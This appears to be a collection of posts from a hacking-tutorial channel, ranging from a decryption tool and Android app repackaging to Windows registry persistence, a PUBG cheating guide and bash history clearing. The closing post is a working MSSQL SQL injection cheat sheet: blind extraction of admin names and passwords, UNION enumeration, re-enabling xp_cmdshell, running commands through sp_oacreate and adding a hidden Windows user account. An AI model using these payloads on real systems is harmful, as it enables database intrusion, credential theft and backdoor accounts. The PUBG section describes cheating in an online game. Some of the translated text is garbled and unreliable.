▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW 2020 DECRYPTION TOOL :
Ciphey aims to be a tool to automate a lot of decryptions & decodings such as multiple base encodings, classical ciphers, hashes or more advanced cryptography.


F E A T U R E S :

30+ encryptions supported such as encodings (binary, base64) and normal encryptions like Caesar cipher, repeating-key XOR and more. For the full list, click here

Custom Built Artificial Intelligence with Augmented Search (AuSearch) for answering the question "what encryption was used?" Resulting in decryptions taking less than 3 seconds.

Custom built natural language processing module Ciphey can determine whether something is plaintext or not. Whether that

plaintext is JSON, a CTF flag, or English, Ciphey can get it in a couple of milliseconds.

Multi Language Support at present, only German & English (with AU, UK, CAN, USA variants).

Supports encryptions and hashes Which the alternatives such as

CyberChef Magic do not.
C++ core Blazingly fast.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/Ciphey/Ciphey.git

2) cd Ciphey

3) There are 3 ways to run Ciphey.

File Input ciphey -f encrypted.txt

Unqualified input ciphey -- "Encrypted input"

Normal way ciphey -t "Encrypted input"

Gif showing 3 ways to run Ciphey

To get rid of the progress bars, probability table, and all the noise use the quiet mode.

ciphey -t "encrypted text here" -q

For a full list of arguments, run ciphey --help.

don't copy our tutorials
USE FOR LEARN
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ANDROID APP REVERSE ENGINEERING :

1) Download the app from app store or install by somewhere.

2) You need find the target app and pull from the android device.

3) Decompile the apk with apktool
(https://ibotpeaches.github.io/Apktool/)

4) Extract the source code with jadx from the app.
(https://github.com/skylot/jadx)

5) Make a little change to check it’s workable.

6) Compile the code with apktool to build an app.
(https://ibotpeaches.github.io/Apktool/)

7) Sign a key into the app.

8) Install the app by adb or manually install .

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑First, the state should monitor how it works :

1) Whenever a firewall receives a SYN packet TCP connection initialization, check this rule base with the SYN packet is the firewall.

2) The packages are compared in sequence in the rule base. If the packet is not accepted after checking all the rules, then the connection is rejected.

3) A RST packet is sent to the remote machine. If the package is accepted, then this session is recorded in the state monitoring table. The table is in kernel mode. The subsequent data packets (without a SYN flag) are compared with the contents of the state monitoring table. If the session is in the state table and the packet is part of the session, the packet is accepted. If it is not part of the session, the packet is discarded.

4) This method improves the performance of the system, because each data packet is not compared with the rule base, but with the status monitoring table. Only when the SYN packet arrives is it compared with the rule base. All the comparisons between the data packets and the status check table are performed in kernel mode, so it should be fast.

🦑Is the condition monitoring table established?

1) So is it OK to use ACK when initializing a connection? What will happen to it?

2) If the firewall's state detection table uses ACK to establish a session, it will be incorrect.

3) If a packet is not in the state detection table, then the packet is checked using the rule base, regardless of whether it is a SYN, ACK, or other packet. If the rule base passes this packet, the session is added to the state detection table. All subsequent packets will be compared with the status check table and passed. Because there are entries in the state monitoring table, subsequent data packets are not checked for rules. And we also need to consider the problem of time overflow when we are doing status monitoring entries. Using this method, some simple DOS attacks will destroy the firewall system very effectively.

🦑So how should the establishment of the status inspection table proceed?

1) First of all, what do we use to distinguish a session. From the simplest point of view, we can use the source address, destination address and port number to distinguish whether it is a session.

2) When establishing a session by using a SYN packet, the firewall first compares the packet with the rule base. If the data connection request is passed, it is added to the state detection table. At this time, you need to set a time overflow value. Refer to the time value of CHECK-POINT FW-1 and set its value to 60 seconds.

3) Then the firewall expects a return data packet confirming the connection. When receiving such a packet, the firewall sets the connection time overflow value to 3600 seconds. It is necessary to make a judgment on the type of the data packet of the connection request returned, and it has been confirmed that it contains the SYN/ACK flag. (Note: The time overflow value should be set by the user.)

4) When performing status monitoring, the confirmation of a session can only be distinguished by using the source address, destination address and port number. If it can be satisfied in the performance design requirements, but also should consider the maintenance for the serial number of a TCP connection, although this may need to consume more resources

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HIDDEN MALWARE FOR WINODWS IN REGISTRY :

INVISIBLE STABILITY

Malware that runs without elevated privileges on Windows has a limited ability to recover from a system reboot (called persistence).

Malware that elevates privileges using zero-day exploits or public exploits has more potential to persist.

However, zero days are expensive and risk exposing them, and public exploits will not work on patched systems.

Most malware gets stuck using well known save methods that are easy to detect.

The easiest save method is to write the value to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run (or a
similar key to HKEY_LOCAL_MACHINE).

The values ​​for this key are commands that Windows executes when the user logs on (in the case of HKEY_CURRENT_USER) or when it boots (in the case of HKEY_LOCAL_MACHINE).

The malicious program writes the path to its executable file into the Run key.

So it restores execution after reboot.

Since this is a well-known method, the suspicious value in the Run key is a red flag indicating that the system is infected.

It also reveals the location of malware on the system, making it very easy to collect samples for analysis.

FILE-FREE BINARY STORAGE

CONVENTIONAL STORAGE OF FILES ON DISK

Antivirus software scans files on the disk.

Antivirus software hashes files and sends signatures to the cloud.

Some antiviruses perform heuristic scans of files stored on the disk.

Suspected malware files can even be silently sent to the cloud.

To counter this, malware has several options.

Files on disk can be regular droppers that access the Internet and load more essential modules (which are loaded into memory without touching the disk).

Malicious programs can also create executable files that are stored on disk in order not to disable anti-virus heuristics.

For example, because antivirus often scans high-entropy segments in PE (which indicate compressed or encrypted data), malware can avoid using encryption and compression to protect its executable files.

Since the antivirus has heuristics that scans the import tables, malware can avoid importing suspicious functions.

Such countermeasures are burdensome for malware developers and, in any case, do not guarantee that their binaries will not be uploaded to the cloud.

»DOWNLOAD & USAGE :

https://github.com/outflanknl/SharpHide#usage

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Five ways to unlock your Android smartphone with gloves and a mask :

1) Add a trusted bluetooth device
If you are wearing a smartwatch or fitness band, you can use it to unlock your smartphone. In this case, you can leave the reliable biometric protection and pin code on the lock screen enabled. At the same time, using a wearable device, you can easily unlock the device.

To activate, open Settings> Security> Smart lock> Trusted devices. Make sure Bluetooth is turned on on your machine and select Add Trusted Device. Here you will see a list of Bluetooth devices you have connected to before. Select your smartwatch or fitness band and add it.

2) Use an iris scanner on older Samsung flagships
If you have one of the Samsung smartphones listed below, there is an assisted biometric authentication method. The mask and gloves do not bother him. It is an iris scanner. It is enabled under Settings> Biometrics & Security> Iris Scanner> Register Shell.

3) Use an ultrasound scanner on Samsung's new flagships
If you have the latest generation of Samsung flagship smartphones, there is an ultrasonic fingerprint scanner inside the screen. Unlike optical fingerprint scanners on other smartphones, ultrasound uses high-frequency ultrasound to create a clear image of your finger. This sound can pass through delicate materials including latex on protective gloves.

Samsung Galaxy S10

Samsung Galaxy S10 +

Samsung Galaxy Note10

Samsung Galaxy Note 10+

Samsung Galaxy S20

Samsung Galaxy S20 +

Samsung Galaxy S20 Ultra

4) Body recognition
If you don't have a smartwatch, fitness band, or Samsung flagship smartphone, there are still options. Open Settings> Security> Smartlock> Body recognition.

Once activated, the smartphone will remain unlocked while it detects your movements. For example, when you hold it in your hands or put it in your pocket or wallet. If the device is on a table and you are not nearby, it is locked for strangers.

5) Use gestures instead of password and pin code
If you use manual authorization methods such as a password or PIN, you can switch to lock screen gestures and save time. It is less secure than a password, but it only takes one move. You don't need finger dexterity and just take one finger out of the glove.

Open Settings> Security> Lock screen and select a pattern, then follow the instructions.
Your not allowed to copy ou
r tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑- Parrot-kali :Metapackages and Virtual Package:
#UnderstandingLinux

It is important to clearly distinguish between metapackages and virtual packages. The former are real packages (including real .deb files) whose sole purpose is to express dependencies.

Virtual packages, however, do not physically exist; they are only a means of identifying real packages based on common logical criteria (for example, services provided or compatibility with a standard program or an existing package). Sometimes virtual packages are used as short, convenient, or more commonly used aliases for real packages.

🦑List of Kali Linux Metapackages

1) System

2) kali-linux-core : A basic Kali Linux system - basic elements that are always present in any installation

3) kali-linux-default : "Standard" system images that you can download from the download page (AMD64 / i386) include the tools of these images

4) kali-linux-light : Used to create an image of Kali-Light, a light version of the system

5) kali-linux-arm : All tools suitable for ARM devices

6) kali-linux-nethunter : Tools used as part of Kali NetHunter

7) Desktop environments / window managers

8) Desktop environments are full-fledged graphical shells like GNOME, Cinnamon, KDE, XFCE and others.

9) Window managers perform only some of the functions of the graphical interface, in fact, they only allow you to open several windows, add a desktop background, and can have a simple menu. Due to this simplicity, window managers consume a minimum of resources. But from the point of view of user convenience, they are inferior to a full-fledged desktop environment.

10) kali-desktop-core : Any key tools needed to display the GUI.

11) kali-desktop-e17 : Enlightenment (window manager)

12) kali-desktop-gnome : GNOME (desktop environment)

13) kali-desktop-i3 : i3 (window manager)

14) kali-desktop-kde : KDE (desktop environment)

15) kali-desktop-lxde : LXDE (window manager)

16) kali-desktop-mate : MATE (desktop environment)

17) kali-desktop-xfce : XFCE (window manager)
Tools

18) kali-tools-gpu : Tools that work best when you have GPU access

19) kali-tools-hardware : Hardware Hacking Tools

20) kali-tools-crypto-stego : Tools based on cryptography and steganography

21) kali-tools-fuzzing : For fuzzing protocols

22) kali-tools-802-11 : 802.11 (commonly known as "Wi-Fi")

23) kali-tools-bluetooth : For targeting bluetooth devices.

24) kali-tools-rfid : RFID tools

25) kali-tools-sdr : Software-Defined Radio Tools

26) kali-tools-voip : Voice over IP tools

27) kali-tools-windows-resources : Any programs that can run on Windows hosts.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pubg best hacks:

1) First, you need to install the ZAchiever on your mobile phone, which can help you to start the process for your game.

2) Then you have to extract the PUBG Hacking Script file on your Android, which helps to start the hacking process.

3) Next, you have to download the Game Guardian, Strange VPN, and PUBG Game so that you can select the hack schemes.

4) After this, you have to open the dual space and make the clones of PUBG Mobile Game and Game Guardian.

5) Then you have to open the Game Guardian and select the hacking script to execute for the hacking process. It is a must to select the script as, without a script, the process will not run forward.

6) At last, you have to open the PUBG game on your mobile, and there you will able to see a Game Guardian icon floating on the screen. By clicking on that icon, you can perform various tasks in the game such as Wallhack, Automatic Headshots, and many more. There are many other hacks also that you can apply after hacking this game, such as change body color of the player, high damage of enemies, etc.

7) After completing these steps, you are ready with your hacking process, and now you can hack any of the PUBG and perform different tasks.

8) There are various tools available to hack the game, but you can follow these steps it will help you to get a proper hacking game.

5 wiki resources same way :)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WEB EXPLOITS FREE COURSES :

1) [WebSploit](https://websploit.h4cker.org/) is a virtual machine (VM) created by [Omar Santos](https://omarsantos.io) for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions delivered at [DEFCON](https://www.wallofsheep.com/blogs/news/packet-hacking-village-workshops-at-def-con-26-finalized),

2) [Live Training in Safari](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=live%20online%20training&sort=relevance),

3) [video on demand LiveLessons](https://www.safaribooksonline.com/search/?query=omar%20santos&extended_publisher_data=true&highlight=true&is_academic_institution_account=false&source=user&include_assessments=false&include_case_studies=true&include_courses=true&include_orioles=true&include_playlists=true&formats=video&sort=relevance), and others.

The purpose of this VM is to have a lightweight (single VM) with a few web application penetration testing tools, as well as vulnerable applications.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to clear bash history on logout:

How do I automatically clear the GNU Bourne-Again SHell history when exiting the shell?

1) Disable the HISTFILE shell variable at login to prevent command history from being saved when you exit the shell.

$ echo "unset HISTFILE" | sudo tee /etc/profile.d/unset_histfile.sh
Optionally, set the HISTSIZE shell variable to 0 at logon so that commands executed are not stored in the history list.
Attention, this is very inconvenient, as it will completely disable the history in the login shell.
$ echo "HISTSIZE = 0" | sudo tee /etc/profile.d/disable_histsize.sh
Create a /etc/bash.bash_logout file to execute when the shell exits.

Use it to clear history.

2) Don't worry, it will be executed after a separate login shell cleanup file ~ / .bash_logout.

$ echo "history -c" | sudo tee /etc/bash.bash_logout
Note, it will not write an empty history list to the history file.

3) Adding a second command to write the history list to the history file will not work since the HISTFILE shell variable has not been set.
This also means that the history list will not be initialized from the history file on startup.
Delete the existing ~ /.bash_history file to keep everything in order.
But be aware of other users.

4) You can always save the history list to a special file.

Note that this will add the current history list to the file.
$ HISTFILE = session_history.txt history -w
$ cat session_history.txt
cat .bash_history
HISTFILE = session_history.txt history -w

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS NEPTUNE EXPLOIT:

1) Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.

2) Neptune has gained popularity and is still used in 1) malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye has recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.

3) Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club . One such malicious site also mimics the YouTube video to MP3 converter.


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BUG HUNTER full :

Information Gathering
Mapping
Discovery
Exploitation
PoCs & Reporting
Information Gathering :
Basic Commands for Information Gathering
Masscan - TCP Port Scanner
DNS Recon - DNS Enumeration
Sublist3r - Find Subdomains
Alt-DNS - Subdomain Discovery
Amass - In-Depth DNS Enumeration
Subfinder - Subdomain Discovery Tool
Enumall - Setup Script for Regon-NG
Aquatone - Reconnaissance on Domain Names
Cloudflare_Enum - Cloudflare DNS Enumeration
InfoG - Information Gathering Tool
The Harvester - E-mail, SubDomain, Ports etc.
Recon-NG - Web Reconnaissance Framework
SetoolKit - Social Engineering Toolkit
WhatWeb - Next Generation Web Scanner
Maltego - Interactive Data Mining Tool
Mapping :
Nmap - IP's, Open Ports and Much More
Firefox - Web Browser
Firefox Browser Extensions
Burp Suite Pro
Burp Suite Extensions
Intruder Payloads for Burp Suite
Payloads All The Thing
Discovery :
Acunetix-WVS
Arachni
Burp Suite
Nexpose
Nikto
Vega
Wapiti
Web Security Scanner
Websecurify Suite
Joomscan
w3af
Zed Attack Proxy
WP-Scan
FuzzDB
CeWL
Exploitation :
XSS :

XSS Radar
XSSHunter
xssHunter Client
DOMxssScanner
XSSer
BruteXSS
XSStrike
XSS'OR
SQLi :

SQLmap
XXE :

OXML-xxe
XXEinjextor
SSTI :

Tplmap
SSRF :

SSRF-Detector
Ground Control
LFI :

LFISuit
Mobile :

MobSF
GenyMotion
Apktool
dex2jar
jd-gui
idb
Other :

Gen-xbin-Avi
GitTools
DVCS Ripper
TKO Subs
SubBruteforcer
Second-Order
Race The Web
CORStest
RCE Struts-pwn
ysoSerial
PHPGGC
Retire-js
Getsploit
Findsploit
BFAC
WP-Scan
CMSmap
Joomscan
JSON W T T
Wfuzz
Patator
Netcat
ChangeMe
wappalyzer
builtwith
wafw00F
LinkFinder
PoCs & Reporting
Bug Bounty Platforms
POCs (Proof of Concepts)
CheatSheet
EyeWitness
HttpScreenshot
BugBountyTemplates
Template Generator

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/thehackingsage/bughunter.git &&

2) cd bughunter && chmod +x bughunter.py && sudo cp bughunter.py /usr/bin/bughunter

that's it.. type bughunter in terminal to execute the tool.

Video Tutorial : https://www.youtube.com/watch?v=opvQIgUD0Jc&t=18s

don't clone our tutorials
✅git topic
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Adaudit - Powershell script to automate domain auditing:

F E AT U R E S :

What does he do ?

Device Information
Get-HostDetails
Domain audit
Get-MachineAccountQuota
Get-SMB1Support
Get-FunctionalLevel
Get-DCsNotOwnedByDA
Domain trust audit
Get-DomainTrusts
User Account Audit
Get-InactiveAccounts
Get-DisabledAccounts
Get-AdminAccountChecks
Get-NULLSessions
Get-AdminSDHolders
Get-ProtectedUsers
Auditing password information
Get-AccountPassDontExpire
Get-UserPasswordNotChangedRecently
Get-PasswordPolicy
Dumps NTDS.dit
Get-NTDSdit
Object audit
Get-OldBoxes
GPO audit (and checking SYSVOL passwords)
Get-GPOtoFile
Get-GPOsPerOU
Get-SYSVOLXMLS
Check general rights of AD group
Get-OUPerms
Check for LAPS on the domain
Get-LAPSStatus
Check for policies and authentication stores
Get-AuthenticationPoliciesAndSilos
Launch arguments
The following flags can be used in combination with running a script

-hostdetails retrieves the hostname and other useful audit information
-domainaudit retrieves AD information such as functional level
-trusts retrieves information about any trust relationship with the domain
-accounts identifies account problems such as expired, disabled, etc ...
-passwordpolicy returns password policy information
-ntds outputs the NTDS.dit file using ntdsutil
-oldbox identifies legacy OSs like XP / 2003 joined to a domain
-gpo outputs GPOs in XML and HTML for later analysis
-uperms checks for common OU permissions issues
-laps checks if LAPS is installed
-authpolsilos checks for the existence of policies and authentication stores
-all runs all checks, e.g. AdAudit.ps1 -all


DOWNLOAD:
https://github.com/phillips321/adaudit

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

1) Determine whether there is an injection point
'; and 1=1 and 1=2

2) Guess the name of the general table is nothing more than admin adminuser user pass password etc...
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- judge whether The admin table exists

3) Guess the number of accounts. If you encounter 0<return to the correct page 1<return to the error page, the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)

4) Guess the field name and add the field name we think of in the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)

5) Guess the length of each field. Guess the length is to change> 0 until the correct page is returned.

and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)

and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)


🦑Guess the character

6) and 1=(select count(*) from admin where left(name,1)='a')
and 1=(select count(*) from admin where left(name,2)='ab')-
Just add one character at a time and guess like this. If you guess how many digits you just guessed, it's correct, and the account number is calculated.

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
This query sentence can guess the user and password in Chinese. Just change the number after it to the ASSIC code in Chinese and it is OK. Finally, the result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--

7) Look at the server patch = something went wrong and SP4 patch was applied

and 1=(select @@VERSION)--
Look at the permissions of the database connection account and return to normal, which proves to be the server role sysadmin permissions.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

8) Determine the connection database account. (Using the SA account to connect and return to normal = prove that the connected account is SA)

and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
See if xp_cmdshell is deleted


and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--
xp_cmdshell is deleted, restored, supports absolute path restoration
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--

9) Reverse PING own experiment

;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

10) Add account


;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory E: